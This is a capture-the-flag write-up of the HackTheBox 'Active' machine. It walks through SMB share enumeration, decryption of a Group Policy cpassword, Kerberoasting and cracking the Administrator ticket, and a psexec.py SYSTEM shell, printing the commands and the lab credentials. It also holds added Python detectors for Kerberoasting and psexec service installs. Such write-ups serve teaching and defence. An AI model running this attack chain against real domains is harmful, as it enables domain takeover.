
Active

Active is an easy-level Windows machine on HackTheBox. It starts with enumerating an SMB share on a domain controller to find an encrypted GPP password, which we can decrypt to get access to the domain as a low-privileged user. We then find that the Administrator account can be Kerberoasted, giving us full access to the DC.

Enumeration

Nmap shows us

# Nmap 7.93 scan initiated Wed Jan 25 21:02:22 2023 as: nmap -sC -sV -p- -oN nmap.out 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.049s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-26 02:03:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Our trusty nmap script gave us tons of info. The open ports (53, 88, 139, 389, 445) tell us we will be attacking a domain controller, which nmap reports is named DC in the domain active.htb, so we’ll add DC.active.htb and active.htb to our /etc/hosts file. We can poke around SMB to check whether there are any non-standard shares; we can expect to at least see SYSVOL, NETLOGON, and some admin shares (though we probably won’t be able to read their contents). We can use smbclient -L to list the shares, which shows us:

smbclient -L //10.10.10.100/
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.

If we try to connect to any of these shares anonymously, we get tree connect failed: NT_STATUS_ACCESS_DENIED, except for the Replication share. Let’s download the entire share to our machine with:

└─$ smbclient //10.10.10.100/Replication/
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

There’s not much, but we do find a Groups.xml file, which contains a username and an encrypted “cpassword”. Sysadmins used to be able to set user passwords via Group Policy Preferences with cpasswords, until Microsoft patched it in 2014 and blocked the use of cpassword in new policies, which is cool, but they had also published the decryption key on their support site. We can use the default Kali tool gpp-decrypt to decrypt the password. Anyway, this is what the Groups.xml file looks like:

└─$ cat /home/kali/htb/Active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>

Decrypting the cpassword gives us the credentials SVC_TGS:GPPstillStandingStrong2k18, which let us grab the user flag with:

smbclient //10.10.10.100/Users/ -U "SVC_TGS"

We can also use some tools from the Impacket suite to interact with the domain.

./GetADUsers.py -all active.htb/svc_tgs:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Querying active.htb for information about domain.
Name                  Email                           PasswordLastSet        LastLogon           
--------------------  -----------------------------  -------------------  -------------------
Administrator                                         2018-07-18 15:06:40.351723     2023-01-25 18:58:13.159750 
Guest                                                 <never>                        <never>             
krbtgt                                                2018-07-18 14:50:36.972031     <never>             
SVC_TGS                                               2018-07-18 16:14:38.402764     2023-01-26 12:25:29.633317 

We can see if any users are Kerberoastable by requesting service tickets from the domain controller with the GetUserSPNs.py script.

./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

This gives us a service-ticket hash for the Administrator account, which we can crack using john.

john hash.txt --show
?:Ticketmaster1968
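On the DC side, the GetUserSPNs.py -request step above shows up as a burst of event 4769 service-ticket requests with RC4 (0x17) encryption for user accounts that have an SPN. The following is an added example (not code from the original post) of that detection logic run over constructed key=value records standing in for parsed EVTX fields; sqlsvc and backupsvc are made-up accounts for the sample.

```python
"""Flag likely Kerberoasting in Windows Security event 4769 records.
Added example, not code from the original post. GetUserSPNs.py -request asks
the DC for RC4 service tickets for every user account with an SPN; the rules
below look for that. Events are constructed key=value lines standing in for EVTX."""
from collections import defaultdict

RC4_HMAC = "0x17"        # TicketEncryptionType for RC4-HMAC (crackable offline)
SWEEP_THRESHOLD = 3      # distinct user SPNs one principal requests before we call it a sweep


def parse_event(line):
    """'<timestamp> Key=Value ...' -> dict; the first token is the timestamp."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = ts
    return fields


def is_user_spn(service):
    """Computer accounts end in '$'; krbtgt tickets are ordinary TGT traffic."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(lines):
    """One alert per RC4 ticket for a user SPN, plus one per sweeping requester."""
    alerts, by_requester = [], defaultdict(set)
    for ev in map(parse_event, lines):
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue  # only successful service-ticket requests matter here
        svc = ev["ServiceName"]
        if ev.get("TicketEncryptionType") == RC4_HMAC and is_user_spn(svc):
            alerts.append(("rc4_user_spn_ticket", ev["TargetUserName"], svc, ev["ts"]))
            by_requester[ev["TargetUserName"]].add(svc)
    for who, services in by_requester.items():
        if len(services) >= SWEEP_THRESHOLD:
            alerts.append(("kerberoast_sweep", who, sorted(services), None))
    return alerts


# Constructed sample: normal AES traffic, then SVC_TGS pulling RC4 tickets for
# three user SPNs within seconds (sqlsvc and backupsvc are made up for the sample).
SAMPLE_4769 = [
    "2023-01-26T02:04:58Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0",
    "2023-01-26T02:05:01Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0",
    "2023-01-26T02:05:02Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0",
    "2023-01-26T02:05:02Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 Status=0x0",
    "2023-01-26T02:05:03Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=backupsvc TicketEncryptionType=0x17 Status=0x0",
    "2023-01-26T02:05:09Z EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x18",
]
```

The lasting fix is the one the box lacks: no SPN on a privileged account like Administrator, long random passwords on service accounts, and AES-only Kerberos so RC4 tickets stop appearing at all.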

We can then use psexec to get a shell with these credentials:

./psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file TACcfYCj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service xJWe on 10.10.10.100.....
[*] Starting service xJWe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
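The psexec.py output above is noisy from the DC's point of view: a random-named .exe lands in ADMIN$ (the %SystemRoot% directory) and a random-named service is registered to run it as LocalSystem, which the System log records as event 7045. The following is an added example (not code from the original post) that scores 7045 events on those indicators; the allowlist and the VendorAgent entry are assumptions for the sample.

```python
"""Score Windows System event 7045 (new service installed) for psexec-style
lateral movement. Added example, not code from the original post: psexec.py
drops a random-named .exe into ADMIN$ (%SystemRoot%) and registers a random-named
service that runs it as LocalSystem; the indicators below encode exactly that."""
import re

RANDOM_NAME = re.compile(r"^[A-Za-z]{4,8}$")      # e.g. xJWe, TACcfYCj
SYSTEMROOT_EXE = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.I)
KNOWN_GOOD = {"Spooler", "wuauserv", "TrustedInstaller"}   # assumed site allowlist
ALERT_AT = 3     # indicators needed before an event is reported


def case_flip_ratio(name):
    """Fraction of adjacent character pairs that change case; random names score high."""
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return flips / max(len(name) - 1, 1)


def looks_random(name):
    return bool(RANDOM_NAME.match(name)) and case_flip_ratio(name) >= 0.4


def score_7045(ev):
    """Return (score, reasons) for one 7045 event given as a dict of fields."""
    name, path = ev["ServiceName"], ev["ImagePath"]
    if name in KNOWN_GOOD:
        return 0, []
    reasons = []
    if looks_random(name):
        reasons.append("random-looking service name")
    if SYSTEMROOT_EXE.match(path):
        reasons.append("binary sits directly in %SystemRoot% (the ADMIN$ root)")
        if looks_random(path.rsplit("\\", 1)[-1][:-4]):
            reasons.append("random-looking binary name")
    if ev.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return len(reasons), reasons


def alerts_for(events):
    """Events whose score reaches ALERT_AT, as (ServiceName, score, reasons)."""
    return [(ev["ServiceName"], s, r) for ev in events
            for s, r in [score_7045(ev)] if s >= ALERT_AT]


# Constructed sample: the service from the psexec.py run above, then two
# ordinary installs that must stay quiet.
SAMPLE_7045 = [
    {"ServiceName": "xJWe", "ImagePath": "%SystemRoot%\\TACcfYCj.exe", "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe", "AccountName": "LocalSystem"},
    {"ServiceName": "VendorAgent", "ImagePath": "C:\\Program Files\\Vendor\\agent.exe", "AccountName": "LocalSystem"},
]
```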
This post is licensed under CC BY 4.0 by the author.